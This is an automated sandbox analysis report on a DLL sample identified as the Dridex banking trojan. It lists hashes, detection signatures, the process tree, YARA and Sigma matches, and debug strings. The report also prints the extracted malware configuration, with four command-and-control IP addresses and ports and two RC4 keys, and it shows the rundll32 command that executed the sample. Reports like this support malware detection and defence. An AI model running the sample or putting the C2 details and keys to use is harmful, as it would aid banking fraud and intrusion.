Play interactive tour

Edit tour

Windows Analysis Report SecuriteInfo.com.W32.AIDetect.malware1.11362.dll

Overview

General Information

Sample Name:	SecuriteInfo.com.W32.AIDetect.malware1.11362.dll
Analysis ID:	544194
MD5:	43d4b9318439f6926dfbcf46a5291621
SHA1:	06581c15c15cf8345bef1cea5b32fbc7d7d71e03
SHA256:	b06b7b05e576d19367c383aabd9c8fed8cd5e7955e2f1493d326b9b5306c7439
Tags:	dllDridex
Infos:
Most interesting Screenshot:

Detection

Dridex

Score:	76
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Yara detected Dridex unpacked file

Multi AV Scanner detection for submitted file

Sigma detected: Suspicious Call by Ordinal

Tries to delay execution (extensive OutputDebugStringW loop)

C2 URLs / IPs found in malware configuration

Uses 32bit PE files

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

AV process strings found (often used to terminate AV products)

Sample file is different than original file name gathered from version info

One or more processes crash

Contains functionality to query locales information (e.g. system language)

Uses code obfuscation techniques (call, push, ret)

Checks if the current process is being debugged

Internet Provider seen in connection with other malware

Detected potential crypto function

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to call native functions

Creates a process in suspended mode (likely to inject code)

IP address seen in connection with other malware

Entry point lies outside standard sections

Abnormal high CPU Usage

Classification

Process Tree

System is w10x64

loaddll32.exe (PID: 6752 cmdline: loaddll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.11362.dll" MD5: 7DEB5DB86C0AC789123DEC286286B938)

cmd.exe (PID: 4756 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.11362.dll",#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)

rundll32.exe (PID: 6324 cmdline: rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.11362.dll",#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

WerFault.exe (PID: 6712 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6324 -s 696 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)

cleanup

Malware Configuration

Threatname: Dridex

{"Version": 22201, "C2 list": ["144.91.122.102:443", "85.10.248.28:593", "185.4.135.27:5228", "80.211.3.13:8116"], "RC4 keys": ["3IC8sFlUX9XZuoBQY9u5LhcZnHsV7E5r", "hnk63OiMfIbUqQnY7gkPwplwC0Ue5ZkZBYMCTYTjntqX7zsy9OvtNUlthJZXRtFF6P52Zbz6R5"]}

Yara Overview

Memory Dumps

Source	Rule	Description	Author
00000001.00000002.693021141.000000006ECF1000.00000020.00020000.sdmp	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
00000004.00000002.334490741.000000006ECF1000.00000020.00020000.sdmp	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
00000004.00000000.301040628.000000006ECF1000.00000020.00020000.sdmp	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
00000004.00000000.303124420.000000006ECF1000.00000020.00020000.sdmp	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security

Unpacked PEs

Source	Rule	Description	Author
4.2.rundll32.exe.6ecf0000.2.unpack	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
4.0.rundll32.exe.6ecf0000.2.unpack	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
4.0.rundll32.exe.6ecf0000.5.unpack	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
1.2.loaddll32.exe.6ecf0000.2.unpack	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security

Sigma Overview

System Summary:

Sigma detected: Suspicious Call by Ordinal

Show sources

Source: Process started

Author: Florian Roth: Data: Command: rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.11362.dll",#1, CommandLine: rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.11362.dll",#1, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.11362.dll",#1, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 4756, ProcessCommandLine: rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.11362.dll",#1, ProcessId: 6324

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 4.2.rundll32.exe.6ecf0000.2.unpack

Malware Configuration Extractor: Dridex {"Version": 22201, "C2 list": ["144.91.122.102:443", "85.10.248.28:593", "185.4.135.27:5228", "80.211.3.13:8116"], "RC4 keys": ["3IC8sFlUX9XZuoBQY9u5LhcZnHsV7E5r", "hnk63OiMfIbUqQnY7gkPwplwC0Ue5ZkZBYMCTYTjntqX7zsy9OvtNUlthJZXRtFF6P52Zbz6R5"]}

Multi AV Scanner detection for submitted file

Show sources

Source: SecuriteInfo.com.W32.AIDetect.malware1.11362.dll	Virustotal: Detection: 24%			Perma Link
Source: SecuriteInfo.com.W32.AIDetect.malware1.11362.dll	ReversingLabs: Detection: 25%

Source: SecuriteInfo.com.W32.AIDetect.malware1.11362.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL

Source: SecuriteInfo.com.W32.AIDetect.malware1.11362.dll

Static PE information: DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: wkernel32.pdb source: WerFault.exe, 00000008.00000003.312989033.0000000004EC1000.00000004.00000001.sdmp, WerFault.exe, 00000008.00000003.307864938.0000000000CF6000.00000004.00000001.sdmp, WerFault.exe, 00000008.00000003.307347881.0000000004C00000.00000004.00000001.sdmp, WerFault.exe, 00000008.00000003.307414987.0000000000CF6000.00000004.00000001.sdmp
Source:	Binary string: bcrypt.pdb source: WerFault.exe, 00000008.00000003.313002553.0000000005046000.00000004.00000040.sdmp
Source:	Binary string: sfc_os.pdb source: WerFault.exe, 00000008.00000003.313002553.0000000005046000.00000004.00000040.sdmp
Source:	Binary string: ucrtbase.pdb source: WerFault.exe, 00000008.00000003.312997657.0000000005040000.00000004.00000040.sdmp
Source:	Binary string: msvcrt.pdb source: WerFault.exe, 00000008.00000003.312989033.0000000004EC1000.00000004.00000001.sdmp
Source:	Binary string: nCReportStore::Prune: MaxReportCount=%d MaxSizeInMb=%dRSDSwkernel32.pdb source: WerFault.exe, 00000008.00000002.323657432.0000000000782000.00000004.00000001.sdmp
Source:	Binary string: wrpcrt4.pdb source: WerFault.exe, 00000008.00000003.312997657.0000000005040000.00000004.00000040.sdmp
Source:	Binary string: wntdll.pdb source: loaddll32.exe, 00000001.00000003.307015548.000000004B280000.00000004.00000001.sdmp, WerFault.exe, 00000008.00000003.312989033.0000000004EC1000.00000004.00000001.sdmp, WerFault.exe, 00000008.00000003.308326568.0000000000CF0000.00000004.00000001.sdmp, WerFault.exe, 00000008.00000003.307409840.0000000000CF0000.00000004.00000001.sdmp
Source:	Binary string: combase.pdbL source: WerFault.exe, 00000008.00000003.313002553.0000000005046000.00000004.00000040.sdmp
Source:	Binary string: sfc.pdb\1 source: WerFault.exe, 00000008.00000003.313002553.0000000005046000.00000004.00000040.sdmp
Source:	Binary string: shcore.pdb source: WerFault.exe, 00000008.00000003.312997657.0000000005040000.00000004.00000040.sdmp
Source:	Binary string: imagehlp.pdb$ source: WerFault.exe, 00000008.00000003.313002553.0000000005046000.00000004.00000040.sdmp
Source:	Binary string: cryptbase.pdbJ source: WerFault.exe, 00000008.00000003.313002553.0000000005046000.00000004.00000040.sdmp
Source:	Binary string: wgdi32.pdb source: WerFault.exe, 00000008.00000003.312989033.0000000004EC1000.00000004.00000001.sdmp
Source:	Binary string: advapi32.pdb source: WerFault.exe, 00000008.00000003.313002553.0000000005046000.00000004.00000040.sdmp
Source:	Binary string: fltLib.pdb source: WerFault.exe, 00000008.00000003.313002553.0000000005046000.00000004.00000040.sdmp
Source:	Binary string: wsspicli.pdb source: WerFault.exe, 00000008.00000003.313002553.0000000005046000.00000004.00000040.sdmp
Source:	Binary string: shell32.pdb source: WerFault.exe, 00000008.00000003.312997657.0000000005040000.00000004.00000040.sdmp
Source:	Binary string: dwmapi.pdbW source: WerFault.exe, 00000008.00000003.313002553.0000000005046000.00000004.00000040.sdmp
Source:	Binary string: mpr.pdb_0 source: WerFault.exe, 00000008.00000003.312997657.0000000005040000.00000004.00000040.sdmp
Source:	Binary string: msvcp_win.pdb source: WerFault.exe, 00000008.00000003.312989033.0000000004EC1000.00000004.00000001.sdmp
Source:	Binary string: wimm32.pdb source: WerFault.exe, 00000008.00000003.313002553.0000000005046000.00000004.00000040.sdmp
Source:	Binary string: wkernelbase.pdb source: WerFault.exe, 00000008.00000003.307420438.0000000000CFC000.00000004.00000001.sdmp, WerFault.exe, 00000008.00000003.312989033.0000000004EC1000.00000004.00000001.sdmp, WerFault.exe, 00000008.00000003.307772141.0000000000CFC000.00000004.00000001.sdmp
Source:	Binary string: shlwapi.pdb source: WerFault.exe, 00000008.00000003.313002553.0000000005046000.00000004.00000040.sdmp
Source:	Binary string: mpr.pdb source: WerFault.exe, 00000008.00000003.312997657.0000000005040000.00000004.00000040.sdmp
Source:	Binary string: wwin32u.pdb source: WerFault.exe, 00000008.00000003.312989033.0000000004EC1000.00000004.00000001.sdmp
Source:	Binary string: setupapi.pdb source: WerFault.exe, 00000008.00000003.313002553.0000000005046000.00000004.00000040.sdmp
Source:	Binary string: wUxTheme.pdbP source: WerFault.exe, 00000008.00000003.313002553.0000000005046000.00000004.00000040.sdmp
Source:	Binary string: wUxTheme.pdb source: WerFault.exe, 00000008.00000003.313002553.0000000005046000.00000004.00000040.sdmp
Source:	Binary string: imagehlp.pdb source: WerFault.exe, 00000008.00000003.313002553.0000000005046000.00000004.00000040.sdmp
Source:	Binary string: dwmapi.pdb source: WerFault.exe, 00000008.00000003.313002553.0000000005046000.00000004.00000040.sdmp
Source:	Binary string: RFFGTEQ.pdb source: SecuriteInfo.com.W32.AIDetect.malware1.11362.dll
Source:	Binary string: shcore.pdbk source: WerFault.exe, 00000008.00000003.312997657.0000000005040000.00000004.00000040.sdmp
Source:	Binary string: wntdll.pdb( source: WerFault.exe, 00000008.00000003.308326568.0000000000CF0000.00000004.00000001.sdmp, WerFault.exe, 00000008.00000003.307409840.0000000000CF0000.00000004.00000001.sdmp
Source:	Binary string: profapi.pdb source: WerFault.exe, 00000008.00000003.313002553.0000000005046000.00000004.00000040.sdmp
Source:	Binary string: ws2_32.pdb source: WerFault.exe, 00000008.00000003.313002553.0000000005046000.00000004.00000040.sdmp
Source:	Binary string: winspool.pdb source: WerFault.exe, 00000008.00000003.313002553.0000000005046000.00000004.00000040.sdmp
Source:	Binary string: wgdi32full.pdb source: WerFault.exe, 00000008.00000003.312989033.0000000004EC1000.00000004.00000001.sdmp
Source:	Binary string: shell32.pdbk source: WerFault.exe, 00000008.00000003.312997657.0000000005040000.00000004.00000040.sdmp
Source:	Binary string: sechost.pdb source: WerFault.exe, 00000008.00000003.313002553.0000000005046000.00000004.00000040.sdmp
Source:	Binary string: iphlpapi.pdb source: WerFault.exe, 00000008.00000003.313002553.0000000005046000.00000004.00000040.sdmp
Source:	Binary string: propsys.pdb source: WerFault.exe, 00000008.00000003.313002553.0000000005046000.00000004.00000040.sdmp
Source:	Binary string: wntdll.pdbUGP source: loaddll32.exe, 00000001.00000003.307015548.000000004B280000.00000004.00000001.sdmp
Source:	Binary string: cfgmgr32.pdbk source: WerFault.exe, 00000008.00000003.312997657.0000000005040000.00000004.00000040.sdmp
Source:	Binary string: ws2_32.pdb^ source: WerFault.exe, 00000008.00000003.313002553.0000000005046000.00000004.00000040.sdmp
Source:	Binary string: ucrtbase.pdbk source: WerFault.exe, 00000008.00000003.312997657.0000000005040000.00000004.00000040.sdmp
Source:	Binary string: powrprof.pdbt source: WerFault.exe, 00000008.00000003.313002553.0000000005046000.00000004.00000040.sdmp
Source:	Binary string: powrprof.pdb source: WerFault.exe, 00000008.00000003.313002553.0000000005046000.00000004.00000040.sdmp
Source:	Binary string: profapi.pdbx source: WerFault.exe, 00000008.00000003.313002553.0000000005046000.00000004.00000040.sdmp
Source:	Binary string: msctf.pdb source: WerFault.exe, 00000008.00000003.313002553.0000000005046000.00000004.00000040.sdmp
Source:	Binary string: AcLayers.pdb source: WerFault.exe, 00000008.00000003.312989033.0000000004EC1000.00000004.00000001.sdmp
Source:	Binary string: wsspicli.pdbn source: WerFault.exe, 00000008.00000003.313002553.0000000005046000.00000004.00000040.sdmp
Source:	Binary string: setupapi.pdbF source: WerFault.exe, 00000008.00000003.313002553.0000000005046000.00000004.00000040.sdmp
Source:	Binary string: Kernel.Appcore.pdb source: WerFault.exe, 00000008.00000003.312997657.0000000005040000.00000004.00000040.sdmp
Source:	Binary string: cryptbase.pdb source: WerFault.exe, 00000008.00000003.313002553.0000000005046000.00000004.00000040.sdmp
Source:	Binary string: winspool.pdbr source: WerFault.exe, 00000008.00000003.313002553.0000000005046000.00000004.00000040.sdmp
Source:	Binary string: bcryptprimitives.pdb source: WerFault.exe, 00000008.00000003.312997657.0000000005040000.00000004.00000040.sdmp
Source:	Binary string: wkernelbase.pdb( source: WerFault.exe, 00000008.00000003.307420438.0000000000CFC000.00000004.00000001.sdmp, WerFault.exe, 00000008.00000003.307772141.0000000000CFC000.00000004.00000001.sdmp
Source:	Binary string: cfgmgr32.pdb source: WerFault.exe, 00000008.00000003.312997657.0000000005040000.00000004.00000040.sdmp
Source:	Binary string: iphlpapi.pdb" source: WerFault.exe, 00000008.00000003.313002553.0000000005046000.00000004.00000040.sdmp
Source:	Binary string: combase.pdb source: WerFault.exe, 00000008.00000003.313002553.0000000005046000.00000004.00000040.sdmp
Source:	Binary string: Windows.Storage.pdb source: WerFault.exe, 00000008.00000003.312997657.0000000005040000.00000004.00000040.sdmp
Source:	Binary string: rundll32.pdb source: WerFault.exe, 00000008.00000003.312989033.0000000004EC1000.00000004.00000001.sdmp
Source:	Binary string: wkernel32.pdb( source: WerFault.exe, 00000008.00000003.307864938.0000000000CF6000.00000004.00000001.sdmp, WerFault.exe, 00000008.00000003.307414987.0000000000CF6000.00000004.00000001.sdmp
Source:	Binary string: oleaut32.pdb source: WerFault.exe, 00000008.00000003.313002553.0000000005046000.00000004.00000040.sdmp
Source:	Binary string: sfc.pdb source: WerFault.exe, 00000008.00000003.313002553.0000000005046000.00000004.00000040.sdmp
Source:	Binary string: apphelp.pdb source: WerFault.exe, 00000008.00000003.312989033.0000000004EC1000.00000004.00000001.sdmp
Source:	Binary string: wuser32.pdb source: WerFault.exe, 00000008.00000003.312989033.0000000004EC1000.00000004.00000001.sdmp
Source:	Binary string: sechost.pdb` source: WerFault.exe, 00000008.00000003.313002553.0000000005046000.00000004.00000040.sdmp

Networking:

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor	IPs: 144.91.122.102:443
Source: Malware configuration extractor	IPs: 85.10.248.28:593
Source: Malware configuration extractor	IPs: 185.4.135.27:5228
Source: Malware configuration extractor	IPs: 80.211.3.13:8116

Source: Joe Sandbox View	ASN Name: TOPHOSTGR TOPHOSTGR
Source: Joe Sandbox View	ASN Name: HETZNER-ASDE HETZNER-ASDE

Source: Joe Sandbox View	IP Address: 185.4.135.27 185.4.135.27
Source: Joe Sandbox View	IP Address: 85.10.248.28 85.10.248.28

Source: WerFault.exe, 00000008.00000003.322752355.0000000004B82000.00000004.00000001.sdmp, WerFault.exe, 00000008.00000002.324473883.0000000004B82000.00000004.00000001.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: Amcache.hve.8.dr	String found in binary or memory: http://upx.sf.net
Source: loaddll32.exe, 00000001.00000002.693101054.000000006ED0F000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000000.301065037.000000006ED0F000.00000002.00020000.sdmp	String found in binary or memory: http://www.n4pkg6fy8o.gaDVarFileInfo$

E-Banking Fraud:

Yara detected Dridex unpacked file

Show sources

Source: Yara match	File source: 4.2.rundll32.exe.6ecf0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.rundll32.exe.6ecf0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.rundll32.exe.6ecf0000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.loaddll32.exe.6ecf0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.693021141.000000006ECF1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.334490741.000000006ECF1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000000.301040628.000000006ECF1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000000.303124420.000000006ECF1000.00000020.00020000.sdmp, type: MEMORY

System Summary:

Source: SecuriteInfo.com.W32.AIDetect.malware1.11362.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL

Source: SecuriteInfo.com.W32.AIDetect.malware1.11362.dll

Binary or memory string: OriginalFilenameIha.dllD vs SecuriteInfo.com.W32.AIDetect.malware1.11362.dll

Source: C:\Windows\SysWOW64\rundll32.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6324 -s 696

Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6ED00730	1_2_6ED00730
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6ED09370	1_2_6ED09370
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6ECFA4E8	1_2_6ECFA4E8
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6ECF1494	1_2_6ECF1494
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6ECF8428	1_2_6ECF8428
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6ED0143C	1_2_6ED0143C

Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6ED02234 NtDelayExecution,		1_2_6ED02234
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6ED02820 NtAllocateVirtualMemory,		1_2_6ED02820

Source: C:\Windows\System32\loaddll32.exe

Process Stats: CPU usage > 98%

Source: SecuriteInfo.com.W32.AIDetect.malware1.11362.dll	Virustotal: Detection: 24%
Source: SecuriteInfo.com.W32.AIDetect.malware1.11362.dll	ReversingLabs: Detection: 25%

Source: C:\Windows\System32\loaddll32.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.11362.dll",#1

Source: unknown	Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.11362.dll"
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.11362.dll",#1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.11362.dll",#1
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6324 -s 696
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.11362.dll",#1	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.11362.dll",#1	Jump to behavior

Source: C:\Windows\SysWOW64\WerFault.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6324

Source: C:\Windows\SysWOW64\WerFault.exe

File created: C:\ProgramData\Microsoft\Windows\WER\Temp\WER4413.tmp

Jump to behavior

Source: classification engine

Classification label: mal76.troj.evad.winDLL@6/6@0/4

Source: C:\Windows\SysWOW64\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: SecuriteInfo.com.W32.AIDetect.malware1.11362.dll

Static PE information: DYNAMIC_BASE, NX_COMPAT

Source: SecuriteInfo.com.W32.AIDetect.malware1.11362.dll

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: wkernel32.pdb source: WerFault.exe, 00000008.00000003.312989033.0000000004EC1000.00000004.00000001.sdmp, WerFault.exe, 00000008.00000003.307864938.0000000000CF6000.00000004.00000001.sdmp, WerFault.exe, 00000008.00000003.307347881.0000000004C00000.00000004.00000001.sdmp, WerFault.exe, 00000008.00000003.307414987.0000000000CF6000.00000004.00000001.sdmp
Source:	Binary string: bcrypt.pdb source: WerFault.exe, 00000008.00000003.313002553.0000000005046000.00000004.00000040.sdmp
Source:	Binary string: sfc_os.pdb source: WerFault.exe, 00000008.00000003.313002553.0000000005046000.00000004.00000040.sdmp
Source:	Binary string: ucrtbase.pdb source: WerFault.exe, 00000008.00000003.312997657.0000000005040000.00000004.00000040.sdmp
Source:	Binary string: msvcrt.pdb source: WerFault.exe, 00000008.00000003.312989033.0000000004EC1000.00000004.00000001.sdmp
Source:	Binary string: nCReportStore::Prune: MaxReportCount=%d MaxSizeInMb=%dRSDSwkernel32.pdb source: WerFault.exe, 00000008.00000002.323657432.0000000000782000.00000004.00000001.sdmp
Source:	Binary string: wrpcrt4.pdb source: WerFault.exe, 00000008.00000003.312997657.0000000005040000.00000004.00000040.sdmp
Source:	Binary string: wntdll.pdb source: loaddll32.exe, 00000001.00000003.307015548.000000004B280000.00000004.00000001.sdmp, WerFault.exe, 00000008.00000003.312989033.0000000004EC1000.00000004.00000001.sdmp, WerFault.exe, 00000008.00000003.308326568.0000000000CF0000.00000004.00000001.sdmp, WerFault.exe, 00000008.00000003.307409840.0000000000CF0000.00000004.00000001.sdmp
Source:	Binary string: combase.pdbL source: WerFault.exe, 00000008.00000003.313002553.0000000005046000.00000004.00000040.sdmp
Source:	Binary string: sfc.pdb\1 source: WerFault.exe, 00000008.00000003.313002553.0000000005046000.00000004.00000040.sdmp
Source:	Binary string: shcore.pdb source: WerFault.exe, 00000008.00000003.312997657.0000000005040000.00000004.00000040.sdmp
Source:	Binary string: imagehlp.pdb$ source: WerFault.exe, 00000008.00000003.313002553.0000000005046000.00000004.00000040.sdmp
Source:	Binary string: cryptbase.pdbJ source: WerFault.exe, 00000008.00000003.313002553.0000000005046000.00000004.00000040.sdmp
Source:	Binary string: wgdi32.pdb source: WerFault.exe, 00000008.00000003.312989033.0000000004EC1000.00000004.00000001.sdmp
Source:	Binary string: advapi32.pdb source: WerFault.exe, 00000008.00000003.313002553.0000000005046000.00000004.00000040.sdmp
Source:	Binary string: fltLib.pdb source: WerFault.exe, 00000008.00000003.313002553.0000000005046000.00000004.00000040.sdmp
Source:	Binary string: wsspicli.pdb source: WerFault.exe, 00000008.00000003.313002553.0000000005046000.00000004.00000040.sdmp
Source:	Binary string: shell32.pdb source: WerFault.exe, 00000008.00000003.312997657.0000000005040000.00000004.00000040.sdmp
Source:	Binary string: dwmapi.pdbW source: WerFault.exe, 00000008.00000003.313002553.0000000005046000.00000004.00000040.sdmp
Source:	Binary string: mpr.pdb_0 source: WerFault.exe, 00000008.00000003.312997657.0000000005040000.00000004.00000040.sdmp
Source:	Binary string: msvcp_win.pdb source: WerFault.exe, 00000008.00000003.312989033.0000000004EC1000.00000004.00000001.sdmp
Source:	Binary string: wimm32.pdb source: WerFault.exe, 00000008.00000003.313002553.0000000005046000.00000004.00000040.sdmp
Source:	Binary string: wkernelbase.pdb source: WerFault.exe, 00000008.00000003.307420438.0000000000CFC000.00000004.00000001.sdmp, WerFault.exe, 00000008.00000003.312989033.0000000004EC1000.00000004.00000001.sdmp, WerFault.exe, 00000008.00000003.307772141.0000000000CFC000.00000004.00000001.sdmp
Source:	Binary string: shlwapi.pdb source: WerFault.exe, 00000008.00000003.313002553.0000000005046000.00000004.00000040.sdmp
Source:	Binary string: mpr.pdb source: WerFault.exe, 00000008.00000003.312997657.0000000005040000.00000004.00000040.sdmp
Source:	Binary string: wwin32u.pdb source: WerFault.exe, 00000008.00000003.312989033.0000000004EC1000.00000004.00000001.sdmp
Source:	Binary string: setupapi.pdb source: WerFault.exe, 00000008.00000003.313002553.0000000005046000.00000004.00000040.sdmp
Source:	Binary string: wUxTheme.pdbP source: WerFault.exe, 00000008.00000003.313002553.0000000005046000.00000004.00000040.sdmp
Source:	Binary string: wUxTheme.pdb source: WerFault.exe, 00000008.00000003.313002553.0000000005046000.00000004.00000040.sdmp
Source:	Binary string: imagehlp.pdb source: WerFault.exe, 00000008.00000003.313002553.0000000005046000.00000004.00000040.sdmp
Source:	Binary string: dwmapi.pdb source: WerFault.exe, 00000008.00000003.313002553.0000000005046000.00000004.00000040.sdmp
Source:	Binary string: RFFGTEQ.pdb source: SecuriteInfo.com.W32.AIDetect.malware1.11362.dll
Source:	Binary string: shcore.pdbk source: WerFault.exe, 00000008.00000003.312997657.0000000005040000.00000004.00000040.sdmp
Source:	Binary string: wntdll.pdb( source: WerFault.exe, 00000008.00000003.308326568.0000000000CF0000.00000004.00000001.sdmp, WerFault.exe, 00000008.00000003.307409840.0000000000CF0000.00000004.00000001.sdmp
Source:	Binary string: profapi.pdb source: WerFault.exe, 00000008.00000003.313002553.0000000005046000.00000004.00000040.sdmp
Source:	Binary string: ws2_32.pdb source: WerFault.exe, 00000008.00000003.313002553.0000000005046000.00000004.00000040.sdmp
Source:	Binary string: winspool.pdb source: WerFault.exe, 00000008.00000003.313002553.0000000005046000.00000004.00000040.sdmp
Source:	Binary string: wgdi32full.pdb source: WerFault.exe, 00000008.00000003.312989033.0000000004EC1000.00000004.00000001.sdmp
Source:	Binary string: shell32.pdbk source: WerFault.exe, 00000008.00000003.312997657.0000000005040000.00000004.00000040.sdmp
Source:	Binary string: sechost.pdb source: WerFault.exe, 00000008.00000003.313002553.0000000005046000.00000004.00000040.sdmp
Source:	Binary string: iphlpapi.pdb source: WerFault.exe, 00000008.00000003.313002553.0000000005046000.00000004.00000040.sdmp
Source:	Binary string: propsys.pdb source: WerFault.exe, 00000008.00000003.313002553.0000000005046000.00000004.00000040.sdmp
Source:	Binary string: wntdll.pdbUGP source: loaddll32.exe, 00000001.00000003.307015548.000000004B280000.00000004.00000001.sdmp
Source:	Binary string: cfgmgr32.pdbk source: WerFault.exe, 00000008.00000003.312997657.0000000005040000.00000004.00000040.sdmp
Source:	Binary string: ws2_32.pdb^ source: WerFault.exe, 00000008.00000003.313002553.0000000005046000.00000004.00000040.sdmp
Source:	Binary string: ucrtbase.pdbk source: WerFault.exe, 00000008.00000003.312997657.0000000005040000.00000004.00000040.sdmp
Source:	Binary string: powrprof.pdbt source: WerFault.exe, 00000008.00000003.313002553.0000000005046000.00000004.00000040.sdmp
Source:	Binary string: powrprof.pdb source: WerFault.exe, 00000008.00000003.313002553.0000000005046000.00000004.00000040.sdmp
Source:	Binary string: profapi.pdbx source: WerFault.exe, 00000008.00000003.313002553.0000000005046000.00000004.00000040.sdmp
Source:	Binary string: msctf.pdb source: WerFault.exe, 00000008.00000003.313002553.0000000005046000.00000004.00000040.sdmp
Source:	Binary string: AcLayers.pdb source: WerFault.exe, 00000008.00000003.312989033.0000000004EC1000.00000004.00000001.sdmp
Source:	Binary string: wsspicli.pdbn source: WerFault.exe, 00000008.00000003.313002553.0000000005046000.00000004.00000040.sdmp
Source:	Binary string: setupapi.pdbF source: WerFault.exe, 00000008.00000003.313002553.0000000005046000.00000004.00000040.sdmp
Source:	Binary string: Kernel.Appcore.pdb source: WerFault.exe, 00000008.00000003.312997657.0000000005040000.00000004.00000040.sdmp
Source:	Binary string: cryptbase.pdb source: WerFault.exe, 00000008.00000003.313002553.0000000005046000.00000004.00000040.sdmp
Source:	Binary string: winspool.pdbr source: WerFault.exe, 00000008.00000003.313002553.0000000005046000.00000004.00000040.sdmp
Source:	Binary string: bcryptprimitives.pdb source: WerFault.exe, 00000008.00000003.312997657.0000000005040000.00000004.00000040.sdmp
Source:	Binary string: wkernelbase.pdb( source: WerFault.exe, 00000008.00000003.307420438.0000000000CFC000.00000004.00000001.sdmp, WerFault.exe, 00000008.00000003.307772141.0000000000CFC000.00000004.00000001.sdmp
Source:	Binary string: cfgmgr32.pdb source: WerFault.exe, 00000008.00000003.312997657.0000000005040000.00000004.00000040.sdmp
Source:	Binary string: iphlpapi.pdb" source: WerFault.exe, 00000008.00000003.313002553.0000000005046000.00000004.00000040.sdmp
Source:	Binary string: combase.pdb source: WerFault.exe, 00000008.00000003.313002553.0000000005046000.00000004.00000040.sdmp
Source:	Binary string: Windows.Storage.pdb source: WerFault.exe, 00000008.00000003.312997657.0000000005040000.00000004.00000040.sdmp
Source:	Binary string: rundll32.pdb source: WerFault.exe, 00000008.00000003.312989033.0000000004EC1000.00000004.00000001.sdmp
